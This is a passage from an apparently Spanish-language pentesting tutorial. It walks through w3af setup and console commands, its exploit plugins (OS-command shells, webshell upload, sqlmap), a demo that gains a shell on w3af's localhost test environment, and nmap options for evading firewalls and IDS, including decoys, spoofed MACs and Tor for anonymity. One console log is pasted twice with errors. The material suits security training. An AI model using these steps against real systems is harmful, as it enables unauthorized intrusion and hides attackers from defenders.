extraídos de las listas SANS Top Twenty, OWASP Top 10, y OWASP PHP Top 5. Además, provee un módulo para asistir en la securización de Apache y un analizador de logs para analizar los registros del servidor si ya fue atacado. Posee dos versiones, una gratuita y una paga, agregando esta última actualizaciones automáticas, resumen de sesión, generador de reportes e

62 información completa sobre las vulnerabilidades. (http://www.syhunt.com/? section=sandcat) Paros: Una herramienta gratuita multiplataforma realizada en Java, la cual tiene funciones de escáner y proxy y también permite incorporar plugins. Al igual que las demás, está preparada para realizar detecciones de inyecciones SQL, Cross-Site Scripting, y vulnerabilidades específicas de servidores. (http://parosproxy.org/) OWASP WebScarab Project: Otro proxy que permite analizar tráfico e interceptarlo para detectar inyecciones SQL y demás. De código abierto y escrito en Java. (http://www.owasp.org/index.php/category:owasp_webscarab_project) Si queremos conocer aún más opciones en analizadores de vulnerabilidades para aplicaciones web podemos recurrir a la lista de escáners de vulnerabilidades de aplicaciones web del NIST ingresando a

63 W3AF w3af se trata de un framework que permite realizar diferentes tipos de pruebas contra aplicaciones web para determinar que vulnerabilidades puede tener dicha aplicación detallando niveles de criticidad en función al impacto que puedan llegar a tener estas sobre la infraestructura web o sobre sus clientes, en algunos casos se ha dicho que este framework es El metasploit para aplicaciones web dado que se trata de un framework bastante completo y con unas capacidades que difícilmente se encuentran en otras herramientas de la misma índole (open source o comerciales). Por otro lado, se trata de un framework libre, licenciado bajo la GNU/GPLv2 lo que quiere decir que su código se encuentra disponible al publico, ademas de que se puede usar, modificar y redistribuir si es lo que le interesa al usuario. Instalación de w3af via repositorio Para instalar w3af, contamos con 2 mecanismos, en primer lugar en distribuciones basadas en Debian es posible descargarlo desde los repositorios oficiales, dado que se incluye como software, simplemente ejecutando: apt-get install w3af Instalación de w3af via subversion Si deseamos tener la última versión de la aplicación la descargamos desde su repositorio subversion utilizando el comando: svn co https://w3af.svn.sourceforge.net/svnroot/w3af/trunk w3af Luego de haber descargado la última versión de w3af será necesario tener algunas dependencias instaladas para conseguir que el framework pueda ser utilizado correctamente, estas dependencias son: apt-get install python nlkt python-nltk python-lxml python-svn pythonfpconst python-pygooglechart python-soappy python-openssl python-scapy python-lxml python-svn Ahora si queremos ejecutarlo en modo grafico, se deben instalar graphviz apt-get install graphviz La mayoría de estas librerías se encuentran incluidas en las ultimas versiones de Debian y/o Ubuntu, sin embargo, si la instalación de alguna, da algún tipo de fallo o deben instalarse manualmente, el framework incluye todas estas librerías necesarias para ser instaladas manualmente desde el directorio extlib/

64 Ejecutando w3af Para probar que w3af se encuentra correctamente configurado, basta con dirigirse al directorio donde se ha descargado el Framework y ejecutar el comando #./w3af_console Si se encuentra el entorno con todas las librerías correctamente configuradas, con esto se abrirá la consola de w3af lista para recibir comandos, por otro lado para ejecutar la interfaz GTK, desde el mismo directorio ejecutar: #./w3af_gui Funcionamiento de w3af La instalación de w3af tiene ciertos requerimientos que deben ser cumplidos antes de poder utilizar este framework, sin embargo una vez se configura el entorno, utilizar esta herramienta es muy provechoso para realizar diferentes tipos de tareas relacionadas con penetración en aplicaciones web. Para entender el funcionamiento de w3af es necesario en primer lugar, entender como se encuentra subdividido en 3 tipos de Plugins que son: Discovery (Descubrimiento), Audit (Auditoria) y Attack (Ataque). Los 3 interactuan con el fin de detectar vulnerabilidades sobre un objetivo dado y finalmente atacar dicha vulnerabilidad con el fin de inyectar un payload u obtener acceso no autorizado a los recursos del objetivo. En la consola de w3af tenemos los siguientes comandos: w3af>>> help start Start the scan. plugins Enable and configure plugins. exploit Exploit the vulnerability. profiles List and use scan profiles. cleanup Cleanup before starting a new scan http-settings Configure the HTTP settings of the framework. misc-settings Configure w3af misc settings. target Configure the target URL back Go to the previous menu. exit Exit w3af. assert Check assertion help Display help. Issuing: help [command], prints more specific help about "command" version Show w3af version information. keys Display key shortcuts w3af>>> Las opciones tienen su descripción justo al frente, las mas interesantes en primera instancia son target, http-settings y plugins, con el fin de establecer el objetivo, definir la configuración HTTP y finalmente habilitar o desactivar plugins. Por otro lado también se cuenta con el comando back, que permite cambiar de contexto de ejecución, si por ejemplo estamos ubicados en la configuración de HTTP u otros podemos volver al contexto anterior. Probablemente una de las razones por las que w3af es comparado con MetaSploit

65 Framework es por la forma en la que se utilizan los plugins y demás opciones disponibles, ya que todas se encuentran en un único contexto con sus propias opciones de configuración, una característica que resulta bastante familiar en MetaSploit, ya que en MetaSploit, navegamos a través de exploits, payloads, auxiliaries, etc. y cada uno tiene su propio contexto y sus propias opciones de configuración. Objetivos de w3af En primera instancia, es necesario definir donde se encuentra localizada la aplicación web objetivo, para esto, es necesario seguir los siguientes pasos: 1. Establecer el contexto de objetivos en w3af: w3af>>> target w3af/config:target>>> help view List the available options and their values. set Set a parameter value back Go to the previous menu. exit Exit w3af. assert Check assertion w3af/config:target>>> w3af/config:target>>> view Setting Value Description targetos unknown Target operating system (unknown/unix/windows) targetframework unknown Target programming framework (unknown/php/asp/java/jsp/cfm/ruby/perl) target A comma separated list of URLs w3af/config:target>>> 2. Definir la ruta de la aplicación que será el objetivo de nuestro análisis w3af/config:target>>> set target 3. Opcionalmente, establecer la plataforma del objetivo y el lenguaje en el que esta escrita la aplicación web: w3af>>> target set targetos windows w3af>>> target set targetframework jsp Como puede apreciarse, en los comandos anteriores no ha sido necesario desplazarse hasta el contexto de target para establecer una propiedad, sin embargo a lo largo de los siguientes pasos siempre se navegará hasta el contexto correspondiente con el fin de aclarar conceptos. Configuraciones de w3af Las opciones generales de configuración de w3af, se dividen en dos categorías, a saber, parámetros de configuración del protocolo HTTP y parámetros de configuración de uso

66 general del Framework, a continuación se su funcionamiento: HTTP Settings Para configurar adecuadamente estas propiedades es necesario navegar a la opción correspondiente y conocer las opciones de configuración HTTP disponibles, con esto en mente, se procede a indicar los pasos para editar estas propiedades. 1. Establecer el contexto de Configuración de protocolo HTTP. w3af>>> http-settings w3af/config:http-settings>>> 2. Listar las opciones de configuración disponibles. w3af/config:http-settings>>> view Setting Value Description urlparameter Append the given URL parameter to every accessed URL. Example: timeout 15 The timeout for connections to the HTTP server headersfile Set the headers filename. This file has additional headers that are added to each request ignoresesscookies False Ignore session cookies cookiejarfile Set the cookiejar filename ntlmauthuser Set the NTLM authentication username for HTTP requests ntlmauthpass Set the NTLM authentication password for HTTP requests maxfilesize Maximum file size useragent w3af.sourceforge.net User Agent header maxretrys 2 Maximum number of retries never404 A comma separated list that determines what URLs will NEVER be detected as 404 pages. always404 A comma separated list that determines what URLs will ALWAYS be detected as 404 pages. 404string If this string is found in an HTTP response, then it will be tagged as a proxyport 8080 Proxy TCP port proxyaddress Proxy IP address basicauthuser Set the basic authentication username for HTTP requests

67 basicauthpass Set the basic authentication password for HTTP requests basicauthdomain Set the basic authentication domain for HTTP requests w3af/config:http-settings>>> 3. Estableciendo algunas propiedades de configuración HTTP w3af/config:http-settings>>> set basicauthdomain localhost w3af/config:http-settings>>> set basicauthuser admin w3af/config:http-settings>>> set basicauthpass password w3af/config:http-settings>>> set 404string w3af no ha encontrado el recurso w3af/config:http-settings>>> set always404 /page1.html /page1.jsp /page1.asp /page1.jsf w3af/config:http-settings>>> set never404 /index.html Evidentemente las opciones de configuración dependen directamente de la información que tengamos del objetivo, con el fin de establecer opciones personalizadas que se adapten al escaneo que se pretende realizar. Misc Settings Se trata de parámetros de configuración globales para determinar el funcionamiento del Framework, en especial con aquellas características del Framework que están relacionadas con la integración de herramientas externas, para configurar estas características se siguen los siguientes pasos: 1. Establecer el contexto de parámetros globales del Framework. w3af>>> misc-settings w3af/config:misc-settings>>> 2. Listando los parámetros de configuración globales del Framework. w3af>>> misc-settings w3af/config:misc-settings>>> view Setting Value Description exportfuzzablerequests Export all discovered fuzzable requests to the given file (CSV) interface eth0 Local interface name to use when sniffing, doing reverse connections, etc. localaddress Local IP address to use when doing reverse connections maxdiscoverytime 120 Maximum discovery time (minutes) maxthreads 15 Maximum number of threads that the w3af process will spawn. Zero means no threads (recommended) autodependencies True Automatic dependency enabling for plugins demo False Enable this when you are doing a demo in a conference nontargets A comma separated list of URLs that w3af should completely ignore

68 --- fuzzformcombovalues tmb Indicates what HTML form combo values w3af plugins will use: all, tb, tmb, t, b fuzzfcext txt Indicates the extension to use when fuzzing file content fuzzableheaders A list with all fuzzable header names fuzzcookie False Indicates if w3af plugins will use cookies as a fuzzable parameter fuzzfilecontent True Indicates if w3af plugins will send the fuzzed payload to the file forms fuzzfilename False Indicates if w3af plugins will send fuzzed filenames in order to find vulnerabilities Estableciendo valores de configuración para los parámetros que resulten de interés. w3af/config:misc-settings>>> set demo True w3af/config:misc-settings>>> set msf_location /opt/metasploit3/msf3 w3af/config:misc-settings>>> set maxdiscoverytime 60 Plugins w3af Los plugins en w3af son la base del framework, ya que separa de forma lógica las 3 categorías de acciones llevadas a cabo, que son Descubrimiento, Auditoria y Explotación o Ataque, cada uno de los plugins disponibles en w3af corresponden a una de las 3 categorías anteriormente mencionadas, y cada uno de estos a su vez, tienen subplugins que pueden ser activados o desactivados dependiendo de las necesidades de la ejecución del escaneo/ataque. En este punto, los plugins que se encuentran en la jerarquía mas alta en w3af se pueden listar de la siguiente forma: w3af>>> plugins w3af/plugins>>> help list List available plugins back Go to the previous menu. exit Exit w3af. assert Check assertion discovery View, configure and enable discovery plugins bruteforce View, configure and enable bruteforce plugins evasion View, configure and enable evasion plugins audit View, configure and enable audit plugins grep View, configure and enable grep plugins output View, configure and enable output plugins mangle View, configure and enable mangle plugins w3af/plugins>>>

69 Los plugins anteriores corresponden a los plugins principales contenidos en w3af, cada uno de estos puede ser configurado para activar o desactivar determinados sub-plugins que se encuentran incluidos en el plugin principal, de esta forma, se crea una estructura jerárquica de plugins que pueden ser activados y configurados de distintos modos. La arquitectura y el flujo de información entre los plugins disponibles en w3af es el siguiente: El funcionamiento de estos plugins se ejecuta en el siguiente orden: 1. Se ejecutan los plugins de Discovery habilitados para intentar descubrir peticiones fuzzables, esas son potenciales vulnerabilidades que pueden ser tomadas en cuenta luego por los plugins de Auditoria. Todos los plugins de Descubrimiento se ejecutan en ciclo constante donde cada salida de uno de ellos es enviada al siguiente, de esta forma, el procesamiento no termina hasta que todos los plugins terminan, por este motivo, en ocasiones un escaneo puede llevar horas, en especial cuando se habilitan todos. Por otro lado algunos plugins también intentan recolectar información sobre el objetivo, como por ejemplo tipo de servidor, fingerprint del servicio httpd, métodos HTTP, detección de load balancer en el objetivo, etc. 2. Posteriormente se ejecutan los plugins de auditoria que toman como entrada, la salida de la ejecución de los plugins de descubrimiento, el objetivo de los plugins de auditoria es recopilar la mayor cantidad de vulnerabilidades sobre el objetivo y posteriormente almacenarlas en una zona conocida como objetos vulnerables que posteriormente pueden ser tomados como insumo para los plugins de exploits que intentaran aprovecharlas. 3. Finalmente, se encuentran los plugins de ataque que se encargan de leer la zona de Conocimiento Base y obtener los objetos vulnerables almacenados por los plugins de auditoria, estos plugins intentan aprovechar dichas vulnerabilidades intentando inyectar un payload en el objetivo. 4. Los pasos anteriores son el escenario típico de un escaneo con w3af, sin embargo, estos tienen el apoyo de otros plugins que facilitan determinadas funciones que son necesarias, en esta categoría de Plugins se encuentran: 1. Output: Especifica el formato de salida de los mensajes que produce la ejecución de cada plugin. 2. Mangle: Intentan modificar las peticiones y respuestas por medio de expresiones regulares. 3. Evasion: Intentan modificar las peticiones con el fin de evadir sistemas IDS instalados en el objetivo. 4. Bruteforce: Intentan ejecutar un ataque de fuerza bruta contra login

70 Navegado por los Plugins Navegar por plugins y sus configuraciones es uno de los primeros pasos que se deben realizar en orden de habilitar aquellos que resulten interesantes dependiendo del conocimiento que se tenga del objetivo y otros criterios que puedan ser también aplicables, a continuación se listan los comandos utilizados para navegar, configurar y activar/desactivar plugins. w3af>>> plugins w3af/plugins>>> list audit Plugin name Status Conf Description LDAPi Find LDAP injection bugs. blindsqli Yes Find blind SQL injection vulnerabilities. buffoverflow Find buffer overflow vulnerabilities. dav Verify if the WebDAV module is properly configured. eval Yes Find insecure eval() usage. fileupload Yes Uploads a file and then searches for the file inside all known directories. formatstring Find format string vulnerabilities. frontpage Yes Tries to upload a file using frontpage extensions (author.dll). generic Yes Find all kind of bugs without using a fixed database of errors. globalredirect Find scripts that redirect the browser to any site. htaccessmethods Find misconfigurations in the "<LIMIT>" configuration of Apache. localfileinclude Find local file inclusion vulnerabilities. mxinjection Find MX injection vulnerabilities. oscommanding Find OS Commanding vulnerabilities. phishingvector Find phishing vectors. preg_replace Find unsafe usage of PHPs preg_replace. redos Find ReDoS vulnerabilities. remotefileinclude Yes Find remote file inclusion vulnerabilities. responsesplitting Find response splitting vulnerabilities. sqli Find SQL injection bugs. ssi Find server side inclusion vulnerabilities. sslcertificate Check the SSL certificate validity( if https is being used ). unssl Find out if secure content can also be fetched using http. xpath Find XPATH injection vulnerabilities. xsrf Find the easiest to exploit xsrf vulnerabilities. xss Yes Find cross site scripting vulnerabilities. xst Find Cross Site Tracing vulnerabilities w3af/plugins>>> Existen 4 columnas que corresponden a:

71 1. Plugin Name: Nombre del Plugin 2. Status: Estado del Plugin Activado/Desactivado. 3. Conf: Indica si tiene opciones de configuración personalizadas. 4. Description: Descripción del Plugin. Consultar información sobre uno de los plugins del listado: w3af/plugins>>> help audit View, configure and enable audit plugins Syntax: audit [config plugin plugin1[,plugin2... pluginn] desc plugin] Example1: audit Result: All enabled audit plugins are listed. Example2: audit LDAPi,blindSqli Result: LDAPi and blindsqli are configured to run Example3: audit config LDAPi Result: Enters to the plugin configuration menu. Example4: audit all,!blindsqli Result: All audit plugins are configured to run except blindsqli. Example5: audit desc LDAPi Result: You will get the plugin description. Example6: audit LDAPi,blindSqli audit!ldapi Result: LDAPi is disabled in the second command, only blindsqli will run. w3af/plugins>>> Consultar la descripción de un plugin dentro de una de las categorías de plugins raíz, por ejemplo, describir el uso del plugin dav incluido en el plugin audit w3af/plugins>>> audit desc dav This plugin finds WebDAV configuration errors. These errors are generally server configuration errors rather than a web application errors. To check for vulnerabilities of this kind, the plugin will try to PUT a file on a directory that has WebDAV enabled, if the file is uploaded successfully, then we have found a bug. w3af/plugins>>> Activando un plugin dentro de una de las categorías de plugins principales. w3af/plugins>>> audit xss xsrf dav Desactivando un plugin dentro de una de las categorías de plugins principales. w3af/plugins>>> audit!ldapi!sslcertificate Configurando opciones de sub-plugins: w3af/plugins>>> audit config xss w3af/plugins/audit/config:xss>>> view Setting Value Description numberofchecks 3 Set the amount of checks to perform for each fuzzable parameter. Valid numbers: 1 to 15 checkstored True Identify stored cross site scripting vulnerabilities

72 w3af/plugins/audit/config:xss>>> Las instrucciones anteriores corresponden a los pasos que se deben llevar a cabo para configurar cualquier plugin existente en w3af, como puede apreciarse, son bastante sencillos sin embargo se requieren conocimientos avanzados sobre seguridad en aplicaciones web con el fin de establecer una configuración optima. Profiles w3af Los profiles en w3af son simplemente configuraciones guardadas de plugins y sub-plugins habilitados, enfocados en objetivos con características especificas, frecuentemente este tipo de asociaciones se realizan en el momento de iniciar un proceso de recolección de información por medio de otras herramientas como por ejemplo, técnicas de ingeniería social, en cualquier caso, el uso de perfiles, permite habilitar solamente aquellos plugins que resultan interesantes contra un objetivo, desactivando el resto. Establecer el contexto de perfiles: w3af>>> profiles w3af/profiles>>> list Profile Description bruteforce Bruteforce form or basic authentication access controls using default credentials. To run this profile, set the target URL to the resource where the access control is, and then click on Start. audit_high_risk Perform a scan to only identify the vulnerabilities with higher risk, like SQL Injection, OS Commanding, Insecure File Uploads, etc. full_audit_manual_disc Perform a manual discovery using the spiderman plugin, and afterwards scan the site for any known vulnerabilities. full_audit This profile performs a full audit of the target website, using only the webspider plugin for discovery. OWASP_TOP10 The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. OWASP searched for and published the ten most common security flaws. This profile search for this top 10 security flaws. For more information about the security flaws: fast_scan Perform a fast scan of the target site, using only a few discovery plugins and the fastest audit plugins. empty_profile This is an empty profile that you can use to start a new configuration from. web_infrastructure Use all the available techniques in w3af to fingerprint the remote Web infrastructure. sitemap Use different online techniques to create a fast sitemap of the target web application. This plugin will only work if you've got Internet access and the target web application is being spidered by Yahoo!

73 w3af/profiles>>> Usando un Perfile de los listados: w3af/profiles>>> use sitemap The plugins configured by the scan profile have been enabled, and their options configured. Please set the target URL(s) and start the scan. w3af/profiles>>> Exploits w3af Finalmente, una de las partes más importantes en el proceso de escaneo de vulnerabilidades, es el aprovechamiento de las mismas, es aquí donde juegan un papel importante los plugins de ataque de w3af, a continuación se explica como se pueden usar estos plugins desde la consola de w3af 1.Estableciendo el contexto de exploits: w3af>>> exploit w3af/exploit>>> 2. Listando los plugins de ataque: w3af/exploit>>> list Plugin Description sqlmap Exploits [blind] sql injections using sqlmap ( ). oscommandingshell Exploit OS Commanding vulnerabilities. xssbeef Exploit XSS vulnerabilities using beef ( ). localfilereader Exploit local file inclusion bugs. rfiproxy Exploits remote file inclusions to create a proxy server. remotefileincludeshell Exploit remote file include vulnerabilities. davshell Exploit web servers that have unauthenticated DAV access. eval Exploit eval() vulnerabilities. fileuploadshell Exploit applications that allow unrestricted file uploads inside the webroot. sql_webshell Exploits [blind] sql injections by uploading a webshell to the target webroot w3af/exploit>>> 3. Para explotar todas las vulnerabilidades encontradas en busca de una consola remota: w3af/exploit>>> exploit 4. Para ejecutar un Fast Exploit w3af/exploit>>> fastexploit

74 Encontrando Vulnerabilidades, ejecutando Exploits Hasta ahora vimos como utilizar y configurar w3af para ejecutar pruebas de penetración contra aplicaciones web, habilitando diversos tipos de plugins y recolectando información sobre un objetivo determinado. Primero vamos a descargar un entorno de pruebas provisto por w3af. El entorno contiene una aplicaciones web con cada una de las vulnerabilidades incluidas en distintos directorios, lista para desplegar en un servidor apache, (como por ejemplo XAMPP, para pruebas es mas que suficiente), para tener la aplicación web de pruebas de w3af basta con realizar un checkout del repositorio SVN ubicado en la ruta: https://w3af.svn.sourceforge.net/svnroot/w3af/extras/testenv/webroot/w3af/ Solamente es necesario ubicar todos estos archivos en el directorio de aplicaciones del servidor web, posteriormente, es necesario establecer determinadas configuraciones a nivel de Apache, para esto basta con ver el contenido del directorio: https://w3af.svn.sourceforge.net/svnroot/w3af/extras/testenv/apache2config / Donde se encuentran los módulos habilitados y las opciones de configuración adicionales. Una vez establecido el entorno de pruebas, se puede utilizar w3af con el fin de detectar y explotar dichas vulnerabilidades, ahora a probar algunas de las vulnerabilidades incluidas en el entorno de pruebas: Vulnerabilidades OS Command Se trata de una vulnerabilidad que permite a un atacante ejecutar comandos de forma arbitraria en la maquina objetivo, frecuentemente ocasionada por malas practicas de programación. w3af>>> target set target w3af>>> plugins audit oscommanding w3af>>> start There is no point in searching yahoo site explorer for site: "localhost". Yahoo doesnt index private pages. Found 1 URLs and 1 different points of injection. The list of URLs is: - The list of fuzzable requests is: - Method: GET Parameters: (cmd="ls") OS Commanding was found at: "http://localhost/w3af/audit/os_commanding/simple_osc.php", using HTTP method GET. The sent data was: "cmd=ping+-c+9+localhost". This vulnerability was found in the request with id 20. Finished scanning process. w3af>>> w3af>>> target set target Unknown command 'w3af>>>' w3af>>> w3af>>> plugins audit oscommanding Unknown command 'w3af>>>' w3af>>> w3af>>> start Unknown command 'w3af>>>' w3af>>> There is no point in searching yahoo site explorer for site: "localhost". Yahoo doesnt index private pages. Unknown command 'There' w3af>>> Found 1 URLs and 1 different points of injection. Unknown command 'Found' w3af>>> The list of URLs is: Unknown command 'The' w3af>>> - Unknown command '-' w3af>>> The list of fuzzable requests is: Unknown command 'The' w3af>>> - Method: GET Parameters: (cmd="ls") Unknown command '-'

75 w3af>>> OS Commanding was found at: "http://localhost/w3af/audit/os_commanding/simple_osc.php", using HTTP method GET. The sent data was: "cmd=ping+-c+9+localhost". This vulnerability was found in the request with id 20. Unknown command 'OS' w3af>>> Finished scanning process. Unknown command 'Finished' w3af>>> w3af>>> Unknown command 'w3af>>>' w3af>>> exploit exploit oscommandingshell oscommandingshell exploit plugin is starting. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed. Vulnerability successfully exploited. This is a list of available shells and proxies: - [0] <oscommandingshell object (ruser: "www-data" rsystem: "Linux g i686 GNU/Linux")> Please use the interact command to interact with the shell objects. w3af>>> exploit interact 0 Execute "endinteraction" to get out of the remote shell. Commands typed in this menu will be runned through the oscommandingshell shell w3af/exploit/oscommandingshell-0>>> ls blind_osc.php index.html param_osc.php passthru.php simple_osc.php vulnerable.php vulnerable2.php w3af/exploit/oscommandingshell-0>>> Como se ha podido apreciar la ruta indica la vulnerabilidad incluida en el entorno de pruebas w3af, los demás comandos son básicos y se han explicado en el post anterior. Existen muchas más vulnerabilidades que pueden emplearse con w3af. En un entorno cercano a la realidad, lo mas frecuente con w3af es que un atacante utilice esta herramienta para explorar el objetivo de esta forma podrá detectar posibles vulnerabilidades que posteriormente puede aprovechar

76 EVASION DE FIREWALLS Existen distintas técnicas que permiten conocer cuales puertos se encuentran abiertos en una máquina remota, cada una estas técnicas utilizan distintos tipos de envío de paquetes y protocolos, sin embargo, cuando una máquina remota tiene un Firewall o un IDS instalado y correctamente configurado, lo más probable es que los escaneos sean infructuosos, dado que la salida más frecuente, será precisamente ver todos los puertos bloqueados. Por ejemplo, si ejecutamos un clásico escaneo de puertos contra una máquina windows sin un firewall activo, podríamos ver lo siguiente: # nmap -ss -sv Starting nmap 5.21 ( ) at :48 ART nmap scan report for Host is up ( s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:61:34:29 (Cadmus Computer Systems) Service Info: OS: Windows Service detection performed. Please report any incorrect results at nmap done: 1 IP address (1 host up) scanned in 7.71 seconds Es posible ver los puertos y los servicios en ejecución, sin embargo, contra la misma máquina, con el firewall correctamente configurado, lo mas probable es que la salida del mismo comando sea similar a la siguiente: >nmap -ss -sv Starting nmap 5.21 ( ) at :50 ART nmap scan report for Host is up ( s latency). All 1000 scanned ports on are filtered MAC Address: 08:00:27:61:34:29 (Cadmus Computer Systems) Service detection performed. Please report any incorrect results at nmap done: 1 IP address (1 host up) scanned in seconds No solamente el escaneo ha tardado tres veces más, ademas no ha arrojado ningún resultado de interés, solamente que la máquina objetivo se encuentra activa. Cómo es posible determinar si un puerto se encuentra abierto o inclusive el sistema operativo en ejecución si existe un Firewall que impide conocer estos detalles? En nmap existen algunas técnicas que permiten detectar cuando un puerto se encuentra abierto y filtrado por el firewall

77 Técnicas de Evasion con nmap Aunque existen algunos tips que le permiten a un atacante obtener información sobre puertos y servicios que se encuentran filtrados por un firewall, no existe una opción en nmap que permita identificar si un puerto determinado se encuentra abierto y/o esta filtrado por un firewall. Solamente conociendo el protocolo TCP/IP y como funciona el intercambio de paquetes entre dos host, le permite a un atacante identificar cuales puertos se encuentran realmente abiertos. Para controlar las características de envió de paquetes a un host objetivo se pueden establecer algunas opciones en nmap con el fin de controlar y de alguna forma, predecir las respuestas del host objetivo. NOTA: Frecuentemente cuando un sistema se encuentra protegido con un sistema de protección como un Firewall o un IDS, evadir estos mecanismos puede llevar tiempo, en algunos casos incluso horas, ademas, si a esto le adicionamos el uso de Tor, (en el caso de que se trate de un ataque real y se desee anonimato) el tiempo se multiplica, en especial si no se selecciona un nodo de salida concreto para la red de Tor, permitiendo que cada petición viaje por varios nodos de salida de la red. También es bastante frecuente utilizar la técnica de escaneo conocida como Idle Scan (-si) que le permite al usuario proteger su identidad enviando todos los paquetes por medio de una máquina que esta siendo manejada como zombie, esta técnica también tiene cuestiones de rendimiento que hacen que su desempeño sea bastante lento. En resumen, es una tarea que necesita paciencia por parte del atacante y sobre todo practica y experiencia. Veamos algunas de estas opciones que permitiran mantenernos un poco mas a salvo de las miradas de los administradores. -f: Esta opción intenta fragmentar los paquetes que se envían al objetivo en pequeños trozos, de esta forma es un poco mas difícil para un IDS o los Filtros de un Firewall identificar que se trata de un escaneo de puertos, con esta opción hace que nmap divida los paquetes en pequeños trozos de 8 bytes o incluso menos, sin embargo, si lo que se desea es que los fragmentos sean de un tamaño concreto, también se puede especificar la opción --mtu. Por otra parte, si se especifica dos veces en esta opción se duplica el tamaño de los fragmentos en 16 --mtu: Indica el tamaño en bytes de fragmentación de los paquetes que se envíen al objetivo, el valor tiene que ser un múltiplo de 8 y no se debe especificar esta opción junto con -f, cumple los mismos fines que la opción -f, no obstante le da mas control al pentester para especificar un tamaño concreto para los paquetes -D: Ejecuta un escaneo usando distintos señuelos, esto quiere decir que las peticiones que se envían a la máquina objetivo se envían desde las direcciones IP indicadas con esta opción (separadas por coma), estas direcciones IP pueden ser reales o no, la intención es

78 que el origen de las peticiones no sea el mismo para todas, utilizando esta opción junto con tiempos de espera un poco mas largos es posible evadir sistemas de detección de intrusos y en algunos casos restricciones de Firewall. Por otro lado es posible generar estas direcciones de forma aleatoria, simplemente utilizando la palabra clave RND:<numero de direcciones>, también puede usarse la palabra reservada ME para incluir la dirección IP real del atacante en la lista de señuelos. --source-port: Esta opción permite establecer el puerto de origen por donde se enviaran los paquetes, esta opción es útil contra algunos firewall que confían en las peticiones enviadas de cualquier máquina por un puerto determinado, (por ejemplo algunas versiones del firewall Windows aceptan peticiones de maquinas cuyo puerto de origen es el 88, puerto común para la comunicación de Kerberos) --spoof-mac: Esta opción permite al atacante utilizar una MAC distinta a la suya en el proceso de escaneo, inclusive puede sugerir a nmap que genere una MAC correspondiente a un nombre de proveedor como por ejemplo Cisco --data-length: Se trata de la longitud en bytes que contendrá los paquetes aleatorios generados por nmap para enviar al objetivo, en escaneos que intenten evadir restricciones de Firewall, es frecuente usar valores pequeños por cuestiones de rendimiento en el escaneo. --randomize-hosts: Escaneo de hosts aleatorio para cambiar la firma de escaneo y evitar detección de IDS, esta opción le indica a nmap que debe barajar o revolver un grupo de hosts ficticios para que no sea tan evidente el escaneo para el objetivo. --sent-eth: Enviar los paquetes vía Ethernet --ip-options: Consiste en establecer determinadas opciones incluidas en los headers de los paquetes IP, de esta forma pueden engañarse algunas reglas de ciertas configuraciones de Firewall que se basan en algunos de estos campos en los paquetes IP. Si se desea todas ver las opciones incluidas en los paquetes enviados y recibidos, utilizar la opción --packettrace. --ttl: Time To Live de cada uno de los paquetes enviados al objetivo, frecuentemente puede ser empleado para especificar el tiempo que se utilizara en cada escaneo Estas son solo unas de las opciones mas utilizadas para evadir las restricciones de un Firewall. Ejemplo 1: # nmap --spoof-mac Cisco -T4 --source-port 53 \ -ss --send-ip -n --data-length 30 --randomize-hosts \ -PN -p- -f -f -sv --version-all -O -oa target_scan-%d-%t Con este ejemplo utilizamos una mac Cisco, definimos el valor 4 de la opción T para personalizar los controles de tiempo que llevará el escaneo (*), estableciendo el puerto de origen 53, modo stealthy scan, longitud máxima de paquete de 30 bytes, escaneos de hosts aleatorios, no enviamos paquetes ping, escaneamos los puertos desde , generamos

79 paquetes en fragmentos de 16 bytes, realizamos la detección de versión y finalmente generamos un archivo de salida con los resultados formateado con la fecha del escaneo. (*) Niveles: paranoid = 0 / sneaky = 1 / polite = 2 / normal = 3 / aggressive = 4 / insane = 5 Ejemplo 2: # nmap -ss --log-errors --reason packet-trace \ -d3 -D , ,RND:4,ME \ -on nmap-log.nmap Ahora estamos realizando un stealthy scan, enseñando mensajes de error y la razón por la cual un puerto ha sido declarado abiertocerradofiltrado, realizamos un traceo de todos los paquetes enviados a nivel de detalle fino, declaramos el nivel de depuración 3 (el más alto es el 9), declaramos dos señuelos estáticos, cuatro aleatorios y uno que incluye la IP del atacante (esto último en términos prácticos no es aconsejable), finalmente generamos un archivo en formato nmap que puede ser posteriormente relanzado en el caso de que sea interrumpido el escaneo con el siguiente comando: # nmap --resume nmap-log.nmap Ejemplo 3: # nmap --mtu 32 --send-eth --data-length 50 \ --source-port 53 -PN --ip-options \1\8\3\ En este ejemplo establecemos un mtu especifico de 32 bytes por paquete, los paquetes son enviados vía ethernet, establecemos un valor de 50 bytes al máximo de cada paquete de datos, esto indica que este valor se dividirá entre 32 bytes que es la unidad de bytes por paquete, cada paquete es fragmentado en 2 paquetes, uno de 32 bytes y otro de 18, se establece un puerto que es por el que se enviaran los paquetes. Como ya se ha indicado anteriormente, algunos firewall con malas configuraciones permiten conexiones entrantes en función del puerto origen por donde han sido enviados. Se indica a nmap que no realice peticiones ping a la máquina ya que se asume que se encuentra activa, se establece la opción \1\8\3\4 que permite determinar si es una maquina Windows o GNU/Linux dependiendo de la respuesta y finalmente se establecen las opciones de IP. Los valores validos pueden ser: R,T,U,L,S y valores decimales/hexadecimales. Para mayor información les recomiendo visitar En el ejemplo 3, si la máquina objetivo no es Windows la respuesta será similar a la siguiente: SENT (0.1980s) ARP who-has tell RCVD (0.1990s) ARP reply is-at 08:00:27:61:34:29 SENT (0.4500s) ICMP > echo request (type=8/code=0) ttl=46 id=39558 iplen=32 ipopts={ NOP??{\x08\x03\x04}}

